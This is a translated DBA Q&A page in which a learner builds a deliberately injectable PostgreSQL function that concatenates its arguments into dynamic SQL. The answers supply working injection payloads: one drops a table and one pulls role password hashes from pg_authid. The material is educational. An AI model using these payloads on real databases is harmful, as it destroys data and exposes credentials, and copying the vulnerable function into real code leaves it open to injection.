在PostgreSQL 13中,我试图在自己的函数中进行SQL注入
在PostgreSQL 13中,我试图在自己的函数中进行SQL注入
提问于 2022-03-11 12:53:38
为了学习目的,我尝试使用PLPGSQL创建一个函数,并在其上进行SQL注入。我最近了解了format、USING、quote_literal和quote_indent,所以我很擅长避免使用SQL注入。我想要做的是创建一个允许SQL注入(即drop table)的函数。
所以我写了这个:
create or replace function badfunc(tablename text, identifier int4)
returns setof character varying as $
declare
query text;
begin
query := 'select full_name from ' || $1 || ' where re = ' || $2 ||'';
raise notice 'query: %', query;
return query execute query;
end;
$ language 'plpgsql';但是,当我使用select badfunc('; drop table tb_students;', 1001);执行这个函数时,我会得到以下错误:
[42601] ERROR: syntax error at or near ";" where: function PL/pgSQL badfunc(text,integer) linha 7 in RETURN QUERY所以我认为这不是这样的。如何实现这个SQL注入?
回答 2
Database Administration用户
发布于 2022-03-11 13:14:36
您必须使它成为有效的SQL语句:
SELECT badfunc('(VALUES ('done')) AS x(fullname); drop table tb_students; --', 1001);Database Administration用户
发布于 2022-03-11 17:51:38
PostgreSQL的内部限制阻止您在本例中执行多语句注入。您可能不得不满足于数据泄漏。
SELECT badfunc('tb_students', '1001 union all select concat(rolname,rolpassword) from pg_authid');页面原文内容由Database Administration提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://dba.stackexchange.com/questions/308621
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号